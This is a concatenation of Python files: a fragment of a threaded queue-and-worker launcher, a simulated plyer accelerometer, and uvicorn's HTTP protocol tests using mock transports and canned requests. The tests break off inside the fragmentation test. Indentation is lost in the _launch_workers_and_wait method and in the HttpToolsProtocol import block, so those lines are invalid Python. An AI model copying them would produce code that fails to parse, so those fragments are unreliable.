        if monkey_settings.has(MonkeyType.GIBBON) and queue_settings.has(QueueType.SOURCE):
            # [1:] skips the placeholder element at the head of the queue list.
            for source_queue in self.__source_queues[1:]:
                thread = threading.Thread(target=self._produce_source,
                    args=(self.__settings_path, source_queue,
                    self.__monkey_queues[MonkeyType.GIBBON],
                    self.__gibbon_monkeys, self.__source_lock))
                self.__source_workers.append(thread)
def _launch_workers_and_wait(self):
all_workers = self.__seed_workers + self.__source_workers
[worker.start() for worker in all_workers]
[worker.join() for worker in all_workers]
    def serve_forever(self):
        """Wire up queues, launch monkey processes and worker threads, and block.

        Order matters: queues must exist before monkeys are launched, and
        monkeys must be running before the workers start feeding them.
        """
        self._init_seed_and_source_queues()
        self._init_monkey_queues()
        self._launch_monkeys()
        self._init_seed_workers()
        self._init_source_workers()
        self._launch_workers_and_wait()
|
accelerometer.py | '''
'Windows' accelerometer
---------------------
A dummy accelerometer for phone emulation
'''
from plyer.facades import Accelerometer
from sensor_simulate import SemiRandomData
# from multiprocessing import Process, Manager
from threading import Thread
import time
import sys
class AccelerometerSensorListener(object):
    """Simulated accelerometer sensor.

    Polls SemiRandomData on a background thread and keeps the most recent
    (x, y, z) reading in ``self.values``.

    Fix: enable()/disable()/get_data() previously used ``self.value``, an
    attribute never created in __init__, while __init__ initialized an unused
    ``self.state``. Unified on ``self.state`` so the run flag always exists.
    """
    def __init__(self):
        self.sensor = 'DummySensorObj'
        # Latest (x, y, z) reading; None until the first poll completes.
        self.values = [None, None, None]
        # True while the background polling thread should keep running.
        self.state = False
    def enable(self):
        """Start the background polling thread."""
        self.state = True
        self.process_get_data = Thread(target=self.get_data)
        self.process_get_data.start()
    def disable(self):
        """Signal the background polling thread to stop."""
        self.state = False
    def get_data(self):
        """Poll the simulated sensor ~100x/second while enabled."""
        sps_obj = SemiRandomData(3, 3, 9.8, .02)
        while self.state is True:
            a, b, c = sps_obj.get_value()
            self.values[0] = a
            self.values[1] = b
            self.values[2] = c
            time.sleep(.01)
    def monitor(self, time_length=10, frequency=1):
        """Print the current values once per *frequency* seconds, *time_length* times."""
        for i in range(time_length):
            time.sleep(frequency)
            sys.stdout.write(str(self.values) + '\n')
            sys.stdout.flush()
class WinAccelerometer(Accelerometer):
    """Accelerometer facade backed by the simulated sensor listener.

    Fix: __del__ previously called ``super(self.__class__, self).__del__()``;
    with ``self.__class__`` that recurses infinitely if this class is ever
    subclassed, so the class is now named explicitly.
    """
    def __init__(self):
        super(WinAccelerometer, self).__init__()
        # True while a listener is running.
        self.bState = False
    def _enable(self):
        if not self.bState:
            self.listener = AccelerometerSensorListener()
            self.listener.enable()
            self.bState = True
    def _disable(self):
        if self.bState:
            self.bState = False
            self.listener.disable()
            del self.listener
    def _get_acceleration(self):
        # Latest (x, y, z) tuple, or all-None when disabled.
        if self.bState:
            return tuple(self.listener.values)
        else:
            return (None, None, None)
    def __del__(self):
        if self.bState:
            self._disable()
        # NOTE(review): assumes the plyer Accelerometer base defines __del__
        # (the original made the same assumption) -- confirm.
        super(WinAccelerometer, self).__del__()
def instance():
    """Factory entry point: return a new WinAccelerometer."""
    return WinAccelerometer()
|
test_http.py | import asyncio
import contextlib
import logging
import socket
import threading
import time
import pytest
from tests.response import Response
from uvicorn import Server
from uvicorn.config import Config
from uvicorn.main import ServerState
from uvicorn.protocols.http.h11_impl import H11Protocol
try:
from uvicorn.protocols.http.httptools_impl import HttpToolsProtocol
except ImportError: # pragma: nocover
HttpToolsProtocol = None
HTTP_PROTOCOLS = [p for p in [H11Protocol, HttpToolsProtocol] if p is not None]
# Canned raw HTTP/1.1 wire data fed to the protocols in the tests below.
SIMPLE_GET_REQUEST = b"\r\n".join([b"GET / HTTP/1.1", b"Host: example.org", b"", b""])
SIMPLE_HEAD_REQUEST = b"\r\n".join([b"HEAD / HTTP/1.1", b"Host: example.org", b"", b""])
SIMPLE_POST_REQUEST = b"\r\n".join(
    [
        b"POST / HTTP/1.1",
        b"Host: example.org",
        b"Content-Type: application/json",
        b"Content-Length: 18",
        b"",
        b'{"hello": "world"}',
    ]
)
# 100kB body -- large enough to trigger the protocol's read flow control.
LARGE_POST_REQUEST = b"\r\n".join(
    [
        b"POST / HTTP/1.1",
        b"Host: example.org",
        b"Content-Type: text/plain",
        b"Content-Length: 100000",
        b"",
        b"x" * 100000,
    ]
)
# Headers only; the 18-byte body arrives later as FINISH_POST_REQUEST.
START_POST_REQUEST = b"\r\n".join(
    [
        b"POST / HTTP/1.1",
        b"Host: example.org",
        b"Content-Type: application/json",
        b"Content-Length: 18",
        b"",
        b"",
    ]
)
FINISH_POST_REQUEST = b'{"hello": "world"}'
HTTP10_GET_REQUEST = b"\r\n".join([b"GET / HTTP/1.0", b"Host: example.org", b"", b""])
# Percent-encoded path: %2F must stay encoded in raw_path, decoded in path.
GET_REQUEST_WITH_RAW_PATH = b"\r\n".join(
    [b"GET /one%2Ftwo HTTP/1.1", b"Host: example.org", b"", b""]
)
UPGRADE_REQUEST = b"\r\n".join(
    [
        b"GET / HTTP/1.1",
        b"Host: example.org",
        b"Connection: upgrade",
        b"Upgrade: websocket",
        b"Sec-WebSocket-Version: 11",
        b"",
        b"",
    ]
)
# %s is filled in with a (deliberately malformed) request line.
INVALID_REQUEST_TEMPLATE = b"\r\n".join(
    [
        b"%s",
        b"Host: example.org",
        b"",
        b"",
    ]
)
class MockTransport:
    """In-memory stand-in for an asyncio transport.

    Captures everything written by the protocol in ``buffer`` and records
    close / pause / resume calls so tests can assert on them.
    """

    def __init__(self, sockname=None, peername=None, sslcontext=False):
        self.sockname = sockname if sockname is not None else ("127.0.0.1", 8000)
        self.peername = peername if peername is not None else ("127.0.0.1", 8001)
        self.sslcontext = sslcontext
        self.closed = False
        self.buffer = b""
        self.read_paused = False

    def get_extra_info(self, key):
        info = {
            "sockname": self.sockname,
            "peername": self.peername,
            "sslcontext": self.sslcontext,
        }
        return info.get(key)

    def write(self, data):
        # Writing after close is a test bug -- fail loudly.
        assert not self.closed
        self.buffer += data

    def close(self):
        # Double-close is a test bug -- fail loudly.
        assert not self.closed
        self.closed = True

    def pause_reading(self):
        self.read_paused = True

    def resume_reading(self):
        self.read_paused = False

    def is_closing(self):
        return self.closed

    def clear_buffer(self):
        self.buffer = b""

    def set_protocol(self, protocol):
        pass
class MockLoop(asyncio.AbstractEventLoop):
    """Event-loop shim that records tasks and timers for manual draining.

    ``create_task`` / ``call_later`` calls made by the protocol are queued;
    tests then drive them explicitly via ``run_one`` / ``run_later``.
    """

    def __init__(self, event_loop):
        self.tasks = []
        self.later = []
        # Real loop used to actually execute the queued coroutines.
        self.loop = event_loop

    def is_running(self):
        return True  # pragma: no cover

    def create_task(self, coroutine):
        self.tasks.insert(0, coroutine)
        return MockTask()

    def call_later(self, delay, callback, *args):
        self.later.insert(0, (delay, callback, args))

    def run_one(self):
        # FIFO: tasks are inserted at the front and popped from the back.
        self.run_until_complete(self.tasks.pop())

    def run_until_complete(self, coroutine):
        # Temporarily unset the "running loop" so the real loop may run,
        # then restore this mock as the running loop.
        asyncio._set_running_loop(None)
        try:
            return self.loop.run_until_complete(coroutine)
        finally:
            asyncio._set_running_loop(self)

    def close(self):
        self.loop.close()

    def run_later(self, with_delay):
        """Fire every queued timer whose delay is <= *with_delay*."""
        pending = []
        for entry in self.later:
            delay, callback, args = entry
            if delay <= with_delay:
                callback(*args)
            else:
                pending.append(entry)
        self.later = pending
class MockTask:
    """Do-nothing Task stand-in returned by MockLoop.create_task."""
    def add_done_callback(self, callback):
        # Callbacks are ignored; tests drain tasks manually via run_one().
        pass
@contextlib.contextmanager
def get_connected_protocol(app, protocol_cls, event_loop, **kwargs):
    """Yield a protocol instance wired to a MockTransport and MockLoop.

    *kwargs* are forwarded to uvicorn's Config (e.g. root_path, ws,
    log_config, limit_concurrency).  The mock loop is installed as the
    "running" loop so the protocol's create_task/call_later calls are
    captured for manual draining; it is torn down on exit.
    """
    loop = MockLoop(event_loop)
    asyncio._set_running_loop(loop)
    transport = MockTransport()
    config = Config(app=app, **kwargs)
    server_state = ServerState()
    protocol = protocol_cls(config=config, server_state=server_state, _loop=loop)
    protocol.connection_made(transport)
    try:
        yield protocol
    finally:
        protocol.loop.close()
        asyncio._set_running_loop(None)
# GET: the app's status line and body both reach the transport.
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_get_request(protocol_cls, event_loop):
    app = Response("Hello, world", media_type="text/plain")
    with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
        protocol.data_received(SIMPLE_GET_REQUEST)
        protocol.loop.run_one()
        assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
        assert b"Hello, world" in protocol.transport.buffer

# Access log line includes the full request line (query string kept) and status.
@pytest.mark.parametrize("path", ["/", "/?foo", "/?foo=bar", "/?foo=bar&baz=1"])
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_request_logging(path, protocol_cls, caplog, event_loop):
    get_request_with_query_string = b"\r\n".join(
        ["GET {} HTTP/1.1".format(path).encode("ascii"), b"Host: example.org", b"", b""]
    )
    caplog.set_level(logging.INFO, logger="uvicorn.access")
    logging.getLogger("uvicorn.access").propagate = True
    app = Response("Hello, world", media_type="text/plain")
    with get_connected_protocol(
        app, protocol_cls, event_loop, log_config=None
    ) as protocol:
        protocol.data_received(get_request_with_query_string)
        protocol.loop.run_one()
        assert '"GET {} HTTP/1.1" 200'.format(path) in caplog.records[0].message

# HEAD: same status/headers as GET, but the body is suppressed.
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_head_request(protocol_cls, event_loop):
    app = Response("Hello, world", media_type="text/plain")
    with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
        protocol.data_received(SIMPLE_HEAD_REQUEST)
        protocol.loop.run_one()
        assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
        assert b"Hello, world" not in protocol.transport.buffer

# POST: the app receives the request body via receive() messages.
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_post_request(protocol_cls, event_loop):
    async def app(scope, receive, send):
        body = b""
        more_body = True
        while more_body:
            message = await receive()
            body += message.get("body", b"")
            more_body = message.get("more_body", False)
        response = Response(b"Body: " + body, media_type="text/plain")
        await response(scope, receive, send)
    with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
        protocol.data_received(SIMPLE_POST_REQUEST)
        protocol.loop.run_one()
        assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
        assert b'Body: {"hello": "world"}' in protocol.transport.buffer
# A completed response keeps the connection open for reuse.
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_keepalive(protocol_cls, event_loop):
    app = Response(b"", status_code=204)
    with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
        protocol.data_received(SIMPLE_GET_REQUEST)
        protocol.loop.run_one()
        assert b"HTTP/1.1 204 No Content" in protocol.transport.buffer
        assert not protocol.transport.is_closing()

# An idle keep-alive connection is closed once the timeout timer fires
# (still open after 1s, closed after 5s of simulated delay).
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_keepalive_timeout(protocol_cls, event_loop):
    app = Response(b"", status_code=204)
    with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
        protocol.data_received(SIMPLE_GET_REQUEST)
        protocol.loop.run_one()
        assert b"HTTP/1.1 204 No Content" in protocol.transport.buffer
        assert not protocol.transport.is_closing()
        protocol.loop.run_later(with_delay=1)
        assert not protocol.transport.is_closing()
        protocol.loop.run_later(with_delay=5)
        assert protocol.transport.is_closing()

# "connection: close" in the response headers closes after the response.
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_close(protocol_cls, event_loop):
    app = Response(b"", status_code=204, headers={"connection": "close"})
    with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
        protocol.data_received(SIMPLE_GET_REQUEST)
        protocol.loop.run_one()
        assert b"HTTP/1.1 204 No Content" in protocol.transport.buffer
        assert protocol.transport.is_closing()

# Chunked responses end with the terminating zero-length chunk.
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_chunked_encoding(protocol_cls, event_loop):
    app = Response(
        b"Hello, world!", status_code=200, headers={"transfer-encoding": "chunked"}
    )
    with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
        protocol.data_received(SIMPLE_GET_REQUEST)
        protocol.loop.run_one()
        assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
        assert b"0\r\n\r\n" in protocol.transport.buffer
        assert not protocol.transport.is_closing()

# Exactly one terminating chunk is written, never a duplicate.
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_chunked_encoding_empty_body(protocol_cls, event_loop):
    app = Response(
        b"Hello, world!", status_code=200, headers={"transfer-encoding": "chunked"}
    )
    with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
        protocol.data_received(SIMPLE_GET_REQUEST)
        protocol.loop.run_one()
        assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
        assert protocol.transport.buffer.count(b"0\r\n\r\n") == 1
        assert not protocol.transport.is_closing()

# HEAD + chunked: headers only, connection stays open.
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_chunked_encoding_head_request(protocol_cls, event_loop):
    app = Response(
        b"Hello, world!", status_code=200, headers={"transfer-encoding": "chunked"}
    )
    with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
        protocol.data_received(SIMPLE_HEAD_REQUEST)
        protocol.loop.run_one()
        assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
        assert not protocol.transport.is_closing()
# Three pipelined GETs are answered one at a time, in order.
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_pipelined_requests(protocol_cls, event_loop):
    app = Response("Hello, world", media_type="text/plain")
    with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
        protocol.data_received(SIMPLE_GET_REQUEST)
        protocol.data_received(SIMPLE_GET_REQUEST)
        protocol.data_received(SIMPLE_GET_REQUEST)
        protocol.loop.run_one()
        assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
        assert b"Hello, world" in protocol.transport.buffer
        protocol.transport.clear_buffer()
        protocol.loop.run_one()
        assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
        assert b"Hello, world" in protocol.transport.buffer
        protocol.transport.clear_buffer()
        protocol.loop.run_one()
        assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
        assert b"Hello, world" in protocol.transport.buffer
        protocol.transport.clear_buffer()

# A response shorter than its declared content-length forces a close.
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_undersized_request(protocol_cls, event_loop):
    app = Response(b"xxx", headers={"content-length": "10"})
    with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
        protocol.data_received(SIMPLE_GET_REQUEST)
        protocol.loop.run_one()
        assert protocol.transport.is_closing()

# A response longer than its declared content-length forces a close.
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_oversized_request(protocol_cls, event_loop):
    app = Response(b"xxx" * 20, headers={"content-length": "10"})
    with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
        protocol.data_received(SIMPLE_GET_REQUEST)
        protocol.loop.run_one()
        assert protocol.transport.is_closing()

# Large request bodies pause reading (flow control) until consumed.
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_large_post_request(protocol_cls, event_loop):
    app = Response("Hello, world", media_type="text/plain")
    with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
        protocol.data_received(LARGE_POST_REQUEST)
        assert protocol.transport.read_paused
        protocol.loop.run_one()
        assert not protocol.transport.read_paused

# Garbage input closes the connection.
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_invalid_http(protocol_cls, event_loop):
    app = Response("Hello, world", media_type="text/plain")
    with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
        protocol.data_received(b"x" * 100000)
        assert protocol.transport.is_closing()

# An app exception before the response starts yields a 500 and a close.
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_app_exception(protocol_cls, event_loop):
    async def app(scope, receive, send):
        raise Exception()
    with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
        protocol.data_received(SIMPLE_GET_REQUEST)
        protocol.loop.run_one()
        assert b"HTTP/1.1 500 Internal Server Error" in protocol.transport.buffer
        assert protocol.transport.is_closing()
# After headers are sent, a late exception cannot produce a 500; just close.
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_exception_during_response(protocol_cls, event_loop):
    async def app(scope, receive, send):
        await send({"type": "http.response.start", "status": 200})
        await send({"type": "http.response.body", "body": b"1", "more_body": True})
        raise Exception()
    with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
        protocol.data_received(SIMPLE_GET_REQUEST)
        protocol.loop.run_one()
        assert b"HTTP/1.1 500 Internal Server Error" not in protocol.transport.buffer
        assert protocol.transport.is_closing()

# An app that sends nothing at all gets a server-synthesized 500.
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_no_response_returned(protocol_cls, event_loop):
    async def app(scope, receive, send):
        pass
    with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
        protocol.data_received(SIMPLE_GET_REQUEST)
        protocol.loop.run_one()
        assert b"HTTP/1.1 500 Internal Server Error" in protocol.transport.buffer
        assert protocol.transport.is_closing()

# Headers sent but body never completed: close without a 500.
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_partial_response_returned(protocol_cls, event_loop):
    async def app(scope, receive, send):
        await send({"type": "http.response.start", "status": 200})
    with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
        protocol.data_received(SIMPLE_GET_REQUEST)
        protocol.loop.run_one()
        assert b"HTTP/1.1 500 Internal Server Error" not in protocol.transport.buffer
        assert protocol.transport.is_closing()

# Sending response.start twice is a protocol violation; connection closes.
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_duplicate_start_message(protocol_cls, event_loop):
    async def app(scope, receive, send):
        await send({"type": "http.response.start", "status": 200})
        await send({"type": "http.response.start", "status": 200})
    with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
        protocol.data_received(SIMPLE_GET_REQUEST)
        protocol.loop.run_one()
        assert b"HTTP/1.1 500 Internal Server Error" not in protocol.transport.buffer
        assert protocol.transport.is_closing()

# Body before start is a protocol violation; server responds 500.
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_missing_start_message(protocol_cls, event_loop):
    async def app(scope, receive, send):
        await send({"type": "http.response.body", "body": b""})
    with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
        protocol.data_received(SIMPLE_GET_REQUEST)
        protocol.loop.run_one()
        assert b"HTTP/1.1 500 Internal Server Error" in protocol.transport.buffer
        assert protocol.transport.is_closing()

# Extra body messages after completion: response delivered, then close.
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_message_after_body_complete(protocol_cls, event_loop):
    async def app(scope, receive, send):
        await send({"type": "http.response.start", "status": 200})
        await send({"type": "http.response.body", "body": b""})
        await send({"type": "http.response.body", "body": b""})
    with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
        protocol.data_received(SIMPLE_GET_REQUEST)
        protocol.loop.run_one()
        assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
        assert protocol.transport.is_closing()

# ASGI apps must return None; returning a value forces a close.
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_value_returned(protocol_cls, event_loop):
    async def app(scope, receive, send):
        await send({"type": "http.response.start", "status": 200})
        await send({"type": "http.response.body", "body": b""})
        return 123
    with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
        protocol.data_received(SIMPLE_GET_REQUEST)
        protocol.loop.run_one()
        assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
        assert protocol.transport.is_closing()
# Client disconnect mid-request surfaces as an http.disconnect message.
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_early_disconnect(protocol_cls, event_loop):
    got_disconnect_event = False
    async def app(scope, receive, send):
        nonlocal got_disconnect_event
        while True:
            message = await receive()
            if message["type"] == "http.disconnect":
                break
        got_disconnect_event = True
    with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
        protocol.data_received(SIMPLE_POST_REQUEST)
        protocol.eof_received()
        protocol.connection_lost(None)
        protocol.loop.run_one()
        assert got_disconnect_event

# The app may respond before the request body has fully arrived,
# and the late body must not break the connection.
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_early_response(protocol_cls, event_loop):
    app = Response("Hello, world", media_type="text/plain")
    with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
        protocol.data_received(START_POST_REQUEST)
        protocol.loop.run_one()
        assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
        protocol.data_received(FINISH_POST_REQUEST)
        assert not protocol.transport.is_closing()

# receive() after the response completes reports http.disconnect.
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_read_after_response(protocol_cls, event_loop):
    message_after_response = None
    async def app(scope, receive, send):
        nonlocal message_after_response
        response = Response("Hello, world", media_type="text/plain")
        await response(scope, receive, send)
        message_after_response = await receive()
    with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
        protocol.data_received(SIMPLE_POST_REQUEST)
        protocol.loop.run_one()
        assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
        assert message_after_response == {"type": "http.disconnect"}

# HTTP/1.0 requests are reported via scope["http_version"].
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_http10_request(protocol_cls, event_loop):
    async def app(scope, receive, send):
        content = "Version: %s" % scope["http_version"]
        response = Response(content, media_type="text/plain")
        await response(scope, receive, send)
    with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
        protocol.data_received(HTTP10_GET_REQUEST)
        protocol.loop.run_one()
        assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
        assert b"Version: 1.0" in protocol.transport.buffer

# root_path config is exposed through scope["root_path"].
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_root_path(protocol_cls, event_loop):
    async def app(scope, receive, send):
        path = scope.get("root_path", "") + scope["path"]
        response = Response("Path: " + path, media_type="text/plain")
        await response(scope, receive, send)
    with get_connected_protocol(
        app, protocol_cls, event_loop, root_path="/app"
    ) as protocol:
        protocol.data_received(SIMPLE_GET_REQUEST)
        protocol.loop.run_one()
        assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
        assert b"Path: /app/" in protocol.transport.buffer

# scope["raw_path"] keeps percent-encoding; scope["path"] is decoded.
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_raw_path(protocol_cls, event_loop):
    async def app(scope, receive, send):
        path = scope["path"]
        raw_path = scope.get("raw_path", None)
        assert "/one/two" == path
        assert b"/one%2Ftwo" == raw_path
        response = Response("Done", media_type="text/plain")
        await response(scope, receive, send)
    with get_connected_protocol(
        app, protocol_cls, event_loop, root_path="/app"
    ) as protocol:
        protocol.data_received(GET_REQUEST_WITH_RAW_PATH)
        protocol.loop.run_one()
        assert b"Done" in protocol.transport.buffer
# With limit_concurrency=1 an over-limit request is refused with 503.
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_max_concurrency(protocol_cls, event_loop):
    app = Response("Hello, world", media_type="text/plain")
    with get_connected_protocol(
        app, protocol_cls, event_loop, limit_concurrency=1
    ) as protocol:
        protocol.data_received(SIMPLE_GET_REQUEST)
        protocol.loop.run_one()
        assert b"HTTP/1.1 503 Service Unavailable" in protocol.transport.buffer

# Shutdown during an in-flight request: finish the response, then close.
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_shutdown_during_request(protocol_cls, event_loop):
    app = Response(b"", status_code=204)
    with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
        protocol.data_received(SIMPLE_GET_REQUEST)
        protocol.shutdown()
        protocol.loop.run_one()
        assert b"HTTP/1.1 204 No Content" in protocol.transport.buffer
        assert protocol.transport.is_closing()

# Shutdown on an idle connection closes it without writing anything.
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_shutdown_during_idle(protocol_cls, event_loop):
    app = Response("Hello, world", media_type="text/plain")
    with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
        protocol.shutdown()
        assert protocol.transport.buffer == b""
        assert protocol.transport.is_closing()

# Expect: 100-continue gets an interim 100 when the app reads the body.
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_100_continue_sent_when_body_consumed(protocol_cls, event_loop):
    async def app(scope, receive, send):
        body = b""
        more_body = True
        while more_body:
            message = await receive()
            body += message.get("body", b"")
            more_body = message.get("more_body", False)
        response = Response(b"Body: " + body, media_type="text/plain")
        await response(scope, receive, send)
    with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
        EXPECT_100_REQUEST = b"\r\n".join(
            [
                b"POST / HTTP/1.1",
                b"Host: example.org",
                b"Expect: 100-continue",
                b"Content-Type: application/json",
                b"Content-Length: 18",
                b"",
                b'{"hello": "world"}',
            ]
        )
        protocol.data_received(EXPECT_100_REQUEST)
        protocol.loop.run_one()
        assert b"HTTP/1.1 100 Continue" in protocol.transport.buffer
        assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
        assert b'Body: {"hello": "world"}' in protocol.transport.buffer

# No interim 100 is written when the app never reads the body.
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_100_continue_not_sent_when_body_not_consumed(protocol_cls, event_loop):
    app = Response(b"", status_code=204)
    with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
        EXPECT_100_REQUEST = b"\r\n".join(
            [
                b"POST / HTTP/1.1",
                b"Host: example.org",
                b"Expect: 100-continue",
                b"Content-Type: application/json",
                b"Content-Length: 18",
                b"",
                b'{"hello": "world"}',
            ]
        )
        protocol.data_received(EXPECT_100_REQUEST)
        protocol.loop.run_one()
        assert b"HTTP/1.1 100 Continue" not in protocol.transport.buffer
        assert b"HTTP/1.1 204 No Content" in protocol.transport.buffer
# Upgrade requests are rejected with 400 when websockets are disabled.
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_unsupported_upgrade_request(protocol_cls, event_loop):
    app = Response("Hello, world", media_type="text/plain")
    with get_connected_protocol(app, protocol_cls, event_loop, ws="none") as protocol:
        protocol.data_received(UPGRADE_REQUEST)
        assert b"HTTP/1.1 400 Bad Request" in protocol.transport.buffer
        assert b"Unsupported upgrade request." in protocol.transport.buffer

# With ws support enabled, the handshake here yields 426 Upgrade Required.
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_supported_upgrade_request(protocol_cls, event_loop):
    app = Response("Hello, world", media_type="text/plain")
    with get_connected_protocol(
        app, protocol_cls, event_loop, ws="wsproto"
    ) as protocol:
        protocol.data_received(UPGRADE_REQUEST)
        assert b"HTTP/1.1 426 " in protocol.transport.buffer

# Minimal ASGI3 (single-callable) app.
async def asgi3app(scope, receive, send):
    pass

# Minimal ASGI2 (two-stage callable) app.
def asgi2app(scope):
    async def asgi(receive, send):
        pass
    return asgi

# (app, expected scope["asgi"] version info) pairs for test_scopes.
asgi_scope_data = [
    (asgi3app, {"version": "3.0", "spec_version": "2.3"}),
    (asgi2app, {"version": "2.0", "spec_version": "2.3"}),
]

# The protocol advertises the correct ASGI version for each app style.
@pytest.mark.parametrize("asgi2or3_app, expected_scopes", asgi_scope_data)
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_scopes(asgi2or3_app, expected_scopes, protocol_cls, event_loop):
    with get_connected_protocol(asgi2or3_app, protocol_cls, event_loop) as protocol:
        protocol.data_received(SIMPLE_GET_REQUEST)
        protocol.loop.run_one()
        assert expected_scopes == protocol.scope.get("asgi")

# Malformed request lines produce 400 Bad Request.
@pytest.mark.parametrize(
    "request_line",
    [
        pytest.param(b"G?T / HTTP/1.1", id="invalid-method"),
        pytest.param(b"GET /?x=y z HTTP/1.1", id="invalid-path"),
        pytest.param(b"GET / HTTP1.1", id="invalid-http-version"),
    ],
)
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_invalid_http_request(request_line, protocol_cls, caplog, event_loop):
    app = Response("Hello, world", media_type="text/plain")
    request = INVALID_REQUEST_TEMPLATE % request_line
    caplog.set_level(logging.INFO, logger="uvicorn.error")
    logging.getLogger("uvicorn.error").propagate = True
    with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
        protocol.data_received(request)
        assert b"HTTP/1.1 400 Bad Request" in protocol.transport.buffer
        assert b"Invalid HTTP request received." in protocol.transport.buffer
def test_fragmentation():
    """A request split across two TCP segments must be reassembled, not 400'd.

    NOTE(review): this test starts a real server on 127.0.0.1:8000 and waits
    a fixed 1s for startup -- inherently port- and timing-sensitive.
    """
    def receive_all(sock):
        # Drain the socket until the peer closes the connection.
        chunks = []
        while True:
            chunk = sock.recv(1024)
            if not chunk:
                break
            chunks.append(chunk)
        return b"".join(chunks)
    app = Response("Hello, world", media_type="text/plain")
    def send_fragmented_req(path):
        # Send the request in two halves with a short pause between them.
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect(("127.0.0.1", 8000))
        d = (
            f"GET {path} HTTP/1.1\r\n" "Host: localhost\r\n" "Connection: close\r\n\r\n"
        ).encode()
        split = len(path) // 2
        sock.sendall(d[:split])
        time.sleep(0.01)
        sock.sendall(d[split:])
        resp = receive_all(sock)
        sock.shutdown(socket.SHUT_RDWR)
        sock.close()
        return resp
    config = Config(app=app, http="httptools")
    server = Server(config=config)
    t = threading.Thread(target=server.run)
    t.daemon = True
    t.start()
